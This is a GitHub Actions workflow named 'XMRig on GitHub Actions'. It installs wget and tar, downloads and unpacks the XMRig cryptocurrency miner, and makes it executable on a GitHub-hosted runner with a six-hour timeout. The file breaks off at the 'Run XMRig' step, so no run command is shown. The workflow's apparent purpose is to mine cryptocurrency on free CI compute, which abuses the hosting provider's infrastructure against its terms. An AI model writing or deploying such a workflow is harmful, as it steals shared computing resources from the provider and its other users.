name: XMRig on GitHub Actions

on:
  workflow_dispatch:

jobs:
  miner:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - name: Update packages
        run: sudo apt update

      - name: Install dependencies
        run: sudo apt install -y wget tar

      - name: Download XMRig
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-focal-x64.tar.gz
          tar xvaf xmrig-6.24.0-focal-x64.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig

      - name: Run XMRig

